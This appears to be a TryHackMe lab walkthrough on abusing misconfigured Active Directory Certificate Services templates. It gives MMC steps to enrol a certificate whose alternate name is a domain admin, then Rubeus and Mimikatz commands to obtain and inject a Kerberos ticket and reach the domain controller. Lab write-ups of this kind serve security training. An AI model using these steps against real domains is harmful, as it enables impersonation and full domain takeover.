Exploiting certificates

Active Directory Certificate Services (AD CS) is Microsoft’s PKI implementation. It is used in:

  • Establishing trusts between domains

  • Encryption

  • Digital signatures

  • Authentication

  • Certificate templates allow an organization to offload the certificate request process to certain authorized users

Finding vulnerable certificate templates

Use the RDP session on THMSERVER2 to enumerate certificate templates

certutil -Template -v > .\templates.txt

A certificate template can be exploited if the following parameters are present:

  • Client Authentication: Certificate can be used in client authentication

  • CT_FLAG_ENROLEE_SUPPLIES_SUBJECT: Can specify an alternate SAN

  • CTPRIVATEKEY_FLAG_EXPORTABLE_KEY: Can export the private key along with the certificate

  • Certificate Permissions: User has the permissions to use the template

SpecterOps mentions eight common security misconfigurations with AD CS, so it should be noted that there are still a significant amount of potential misconfigurations that can be found.

Exploiting a Certificate Template

Using RDP access on THMSERVER2, request a certificate. (If you use Remmina and save the config of the RDP connection, make sure to disable Restricted admin mode). Use the Microsoft Management Console (MMC):

  • Click Start -> run

  • Type mmc and hit enter

  • Click File -> Add/Remove Snap-in..

  • Add the Certificates snap-in and make sure to select Computer Account and Local computer on the prompts.

  • Click OK

Request a personal certificate:

  • Right Click on Personal and select All Tasks->Request New Certificate…

  • Click Next twice to select the AD enrollment policy.

  • You will see that we have one template that we can request, but first, we need to provide additional information.

  • Click on the More Information warning.

  • Change the Subject name Type option to Common Name and provide any value, since it does not matter, and click Add.

  • Change the Alternative name Type option to User principal name.

  • Supply the UPN of the user you want to impersonate. The best would be a DA account such as Administrator@za.tryhackme.loc and click Add.

  • click Apply and OK.

  • Select the certificate and click Enroll. You should be able to see your certificate.

Export the certificate with the private key:

  • Right-click on the certificate and select All Tasks -> Export…

  • Click Next, select Yes, export the private key, and click Next.

  • Click Next, then set a password for the certificate since the private key cannot be exported without a password.

  • Click Next and select a location to store the certificate.

  • Click Next and finally click Finish.

User impersonation through a certificate

  1. Use the certificate to request a Kerberos ticket-granting ticket (TGT)

  2. Load the Kerberos TGT into your hacking platform of choice

Use Rubeus to Inject the Certificate

C:\Tools\Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:C:\Users\username\Desktop\mycert.pfx /password:Password123 /outfile:pwn.kirbi /domain:za.tryhackme.loc /dc:10.200.60.101

Use Mimikatz to Pass-the-Ticket:

C:\Tools\mimikatz_trunk\x64\mimikatz.exe

mimikatz # privilege::debug
mimikatz # kerberos::ptt pwn.kirbi
mimikatz # misc::cmd

C:> explorer.exe

Browse the file system of the domain controller from THMSERVER2.